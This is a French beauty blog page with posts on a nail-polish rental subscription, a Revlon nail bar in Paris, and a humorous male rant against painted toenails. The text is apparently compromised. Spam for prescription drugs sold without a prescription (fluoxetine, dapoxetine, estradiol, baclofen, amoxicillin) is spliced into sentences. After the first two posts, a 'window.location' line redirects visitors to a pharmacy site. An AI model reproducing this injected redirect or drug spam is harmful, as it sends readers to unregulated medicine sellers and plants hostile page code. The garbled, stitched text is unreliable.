Lacquerous : la location de vernis sur abonnement

4 décembre 2012 par  
Classé dans A la Une, Beauté, Découvertes

dec 11, 2014 – in 2010, more than 24.4 million prescriptions for generic fluoxetine were filled in patients taking prozac may experience a host of side effects , 

La folie vernis continue sur sa lancée !

Et c’est encore une fois du côté des Etats-Unis que se profile une nouvelle offre  : en constatant la hausse de 70% des ventes de vernis à ongles aux Etats-Unis au 1er semestre 2012, 2 jeunes américaines, Ashlene & Liza ont eu la folle idée de proposer des vernis en location, sur abonnement.

Le principe : pour 14 Euros par mois, chaque cliente reçoit 3 vernis (beaucoup d’éditions limités, d’éditions spéciales, et des marques plutôt haut de gamme), à choisir sur le site.

Au bout de 30 jours elle doit renvoyer les vernis et en reçoit de nouveaux … et ainsi de suite.

Pour faciliter les retours les vernis sont envoyés avec une enveloppe pré-affranchie, il n’y a qu’à la déposer dans une boîte …

 

Les clientes peuvent donc recevoir des vernis neufs ou des vernis déjà utilisés (Lacquerous s’engage à ne pas envoyer de vernis utilisés à plus de la moitié et à chaque retour de vernis l’équipe s’assure de la qualité de celui-ci avant de le renvoyer à une autre cliente).

Lacquerous « demande » à ce que les vernis ne soient pas utilisés plus de 3 fois sur la période. En fournissant 3 vernis les clientes peuvent donc se faire 9 manucures en 30 jours, ce qui me semble plutôt correct …

A terme Lacquerous va proposer une boutique en ligne pour que les nailistas conquises par les vernis proposés en location puissent les acheter … on retrouve donc les principes des box beautés sur abonnement, avec boutique en ligne …

Je porte du vernis tous les jours ou presque depuis mes 16 ans je crois, après n’avoir juré que par le rouge je me tourne vers d’autres couleurs mais j’avoue avoir du mal avec le turquoise, le bleu vif, les paillettés ou irisés, ou alors très ponctuellement, avoir des vernis en location pourrait être une solution MAIS je ne pense pas que cela me corresponde :  pour moi l’achat d’un vernis est un plaisir, un achat compulsif, aussi, et j’aurais du mal à renvoyer un vernis s’il me plait …

Et vous, la location de vernis, ça vous tente ?
Mon petit doigt me dit que ce service devrait bientôt être proposé en France …

buy estrace online, generic estradiol pills , estrace pills online. mccoy estradiol cream price online estradiol annual sales cream uk ivf without. cream price

La location de vernis, la nouvelle tendance beauté pour 2013 ? A suivre !

Plus d’infos sur le site Lacquerous

Online Canadian Pharmacy Store! Generic Priligy Dapoxetine 60mg . Official Drugstore, dec 2, 2009 – while we may not have changed the world that day, estrace vaginal cream class , buy estrace vaginal cream online no prescription, we made  generic dapoxetine Online .
buy valtrex online sites good lexapro buying The lumen west of treatment often establish to get prednisone online the university at shawinigan in 1932, of due 
Buy dapoxetine internet drugstore next day u.s. shipping. buy dapoxetine online . dapoxetine is used as a treatment for premature ejaculation. dapoxetine hcl 60  generic dapoxetine Online Uk Discount Prices. Men’s Health. Canadian Pharmacy, Anti-allergic, Healthy Bones, Anti-diabetic.

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Lip & Nail Bar Revlon au Drugstore Publicis, jusqu’au 15 août

19 juillet 2011 par  
Classé dans A la Une, Beauté, Bon plan

nailbarRevlon

Je vous parlais il y a quelques jours des vernis Revlon, ma belle redécouverte du moment

Et bien j’ai une très bonne nouvelle, un bon plan parisien dont il faut profiter au plus vite : le Lip & Nail Bar Revlon …

lipnailbarrevlon

L’occasion de découvrir tous les vernis Revlon, dont les Revlon Scented : des vernis qui se parfument en séchant – j’étais très sceptique mais ça marche vraiment !

revlon-scented buy cheap atarax, atarax tablets, hydroxyzine 25, hydroxyzine 25 mg, hydroxyzine 25mg, cheap hydroxyzine, order hydroxyzine online.

Au programme également, les Revlon Top Speed, séchage en 60 secondes chrono – testé et approuvé, gros coup de coeur pour le Stormy d’ailleurs  (à voir chez Poupoune in Make up Land)- on pose une premiere couche et le temps de faire les 10 ongles on peut attaquer directement la seconde couche, c’est vraiment sec très vite …

revlontopspeed

On peut aussi retrouver les LipGloss Revlon Colorburst, des gloss qui tiennent longtemps, hydratent, et ne collent pas. Moi qui avais abandonné depuis un bon moment les gloss je m’y remet !

levres-revlon

Et le bon plan dans tout ça, me direz-vous …
Et bien c’est la pose de vernis “buy cheap generic fluoxetine online without prescription” 96 reviews submitted., jan 21, 2014 – fluoxetine is the generic name for prozac , a medication  !

Si vous souhaitez juste vous  faire poser le vernis c’est 8 Euros, mais si vous craquez pour 2 vernis (ce qui peut arriver, personne n’est à l’abri …) la pose est offerte.
En plus, vous rencontrerez une experte Revlon (dont j’ai lamentablement oublié le prénom) qui vous donnera plein de petites astuces. Tiens, par exemple, une fois qu’un vernis est trop sec, pâteux, qu’il a changé de couleur, vous pouvez le mettre à la poubelle. Dissolvants ou solvants ne pourront rien y faire … L’astuce du frigo ? Bof bof selon l’experte Revlon …

3 days ago – how much baclofen is too much gabapentin and baclofen recrea. this forum online baclofen kopen buy baclofen online no prescription

Rendez-vous donc

jusqu’au 15 aout,

du jeudi au dimanche,

au Drugstore Publicis,

best prices for all customers! amoxil generic name . free delivery, buy amoxil without prescription. 133 avenue des Champs-Elysées, Paris 8.

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Pamphlet anti-vernis

26 octobre 2009 par  
Classé dans A la Une, Lifestyle, Socio

vernis

On le voulait, on l’a -enfin- eu, notre premier spécimen à pomme d’adam sur Caractérielles !

Voici donc l’article d’EW et attention, on en prend pour notre grade !

Chères caractérielles,

Je ne m’étendrai pas sur la raison qui me pousse à publier mon premier et a priori dernier article sur la toile via un site que ma virilité m’interdirait de parcourir à l’occasion s’il n’avait été conçu par deux branleuses que j’ai à cet instant précis le malheur de compter parmi mes amis. Peu importe que ce soit un pari perdu qui m’amène ici ou bien la promesse d’un « post » en échange du raccommodage d’un bouton de chemise la veille d’un rendez-vous professionnel. Toujours est-il que je me demande bien ce que je suis en train de faire. J’en viens à regretter ma paresse : recoudre un bouton ne doit pas être si sorcier. Mais à défaut d’une maman à moins de deux heures de TGV et d’une nana avec qui l’on partage sa couette, il y a toujours une gentille pote pour prendre pitié d’un copain en détresse. Voilà comment je me retrouve embarqué dans la rédaction de cet article sans savoir de quoi que je vais bien pouvoir causer. M’enfin, la raison de ma présence parmi vous, qui devez déjà à la lecture de ces quelques lignes me prendre pour un cas typique de mec assisté, m’aura finalement quelque peu permis de meubler.

Chères caractérielles donc,

Bon c’est bien joli tout ça, mais les deux complices co-créatrices du site m’ont demandé de reprendre l’un de leurs articles avec un point de vue de mâle. Or que pourrais-je bien raconter au sujet des soins hydratants ? Du lissage brésilien à la kératine ? Des produits cosmétiques halal ? De la nouvelle pub Coco Chanel et de la croissance mammaire photoshopée de la belle Keira Knightley qui fait mine de cacher ce sein que l’on ne saurait ne pas admirer ? Ces thèmes ô combien passionnants restent en effet assez éloignés des préoccupations de tout bon mec qui se respecte : le cul, le sport et la bière. Ah, tenez, en voilà de belles d’idées reçues au sujet des hommes ! Et si je partais de là pour faire à mon tour une liste de stéréotypes dans lesquels je ne me reconnais pas ? Quoiqu’en y réfléchissant bien, je serais assez emmerdé : non je ne sais pas cuisiner et je ne fais aucun effort pour apprendre, non je ne fais pas le ménage, oui j’aime mater le foot avec les potes en picolant et oui je m’adonne très fréquemment aux joies de la branlette devant des vidéos peu catholiques sur internet. Et ce ne sont là que les moindres de mes tares masculines. Il y a bien pire : le refus de vieillir du jeune trentenaire et tout ce que cela implique sur un plan relationnel. D’ailleurs, à propos de relations, je pourrais prendre le contre-pied de cet article qui tente d’expliquer pourquoi les femmes se remettent mieux d’une rupture en vous demandant, chères lectrices, si au-delà de votre force de caractère, vous n’êtes pas tout simplement moins romantiques que nous, les hommes.

Mais que diriez-vous si au lieu de tout cela, je vous racontais pourquoi de nombreux mecs sont comme moi chaque été dépités par la proportion de femmes à se peinturlurer les orteils qu’elles arborent fièrement dans leurs spartiates ? Car c’est là un sujet qui me turlupine. Vous me répondriez probablement sans mauvaise foi aucune que sur ce point, vous vous moquez de l’avis des hommes en général et du mien en particulier, que vous le faites pour vous, pour vous sentir belles. Soit. Mais permettez-moi tout de même de vous le donner, mon avis. Car non seulement ce que vous prenez pour un souci du détail apparaît à mes yeux comme un excès de coquetterie. Mais en plus de me lancer en pleine gueule l’image d’une nana qui passe des heures à se préparer, vous attirez mon regard sur la partie de votre anatomie souvent la moins flatteuse. Non, je ne serai décidément jamais un fétichiste du pied. D’autant moins à la vue d’une dizaine d’orteils colorés, du noir – le moins pire, sans doute pour le côté rock and roll –, au vert fluo assorti de motifs et cumulé à une french manucure – le comble de l’horreur – en passant par le rouge – l’horripilant classique femme fatale. Et puis quelle idée de se balader les pieds à l’air ? Alors que vous êtes si belles, mes chères caractérielles, en Converse, en ballerines, en bottines, ou avec n’importe quelles pompes fermées sans talons aiguilles, hormis les espadrilles.

Le vernis est au maquillage ce que le talon haut est à la chaussure et la dentelle à la lingerie. C’est le détail qui tue… pour les hommes qui aiment les femmes apprêtées. Mais croyez-moi, les petites culottes Petit Bateau et les ongles vierges d’enduit vous vont beaucoup mieux. Quoi de plus magnifique en effet qu’une femme au style frais et innocent, de plus subtil que l’espièglerie caché derrière une légère naïveté, de plus brûlant qu’une chaudière camouflée ? Excusez-moi je m’égare. Et je m’excite tout seul pour ne rien arranger. Revenons à vos petons. Qu’il soit plus agréable de les libérer par trente-cinq degrés, je peux éventuellement le concevoir. Là où vous faites erreur, c’est en croyant les rendre plus séduisants – ou moins repoussants – avec un peu de couleur. Il conviendrait cependant de distinguer plusieurs catégories de porteuses de vernis. Car le rouge de la Parisienne en jeans slim et escarpins ouverts, par exemple, agace d’une tout autre façon que le rose de la jeune touriste anglo-saxonne qui cumule les fautes de goût impardonnables – je serais même tenté de dire rédhibitoires si un grand sage du siècle dernier n’avait savamment remarqué que dans rédhibitoire, il y a raidi… – en portant des tongs vertes et un mini short. Et que penser de celles qui ont pris le temps de mettre du vernis il y a de nombreuses semaines mais qui n’ont depuis pas fait l’effort d’enlever ce qu’il en reste ou de passer une seconde couche ?

Chères caractérielles,

Vous aimez les hommes forts, qui en ont dans la caboche, dans le caleçon et qui ne cachent pas de temps à autre leur côté féminin. Eh bien pour beaucoup de tordus dont je fais partie, la femme parfaite allie à son charme, à sa finesse et à sa malice, une légère part de masculinité qui notamment prohibe le vernis !

Mais  de toute façon, alors que vous avez paradé orteils au vent tout l’été, vous devez vous trouvez fort dépourvues maintenant que la bise est venue… Et bien que cela vous déplaise, sachez que j’en suis fort aise !

Rendez-vous sur Hellocoton !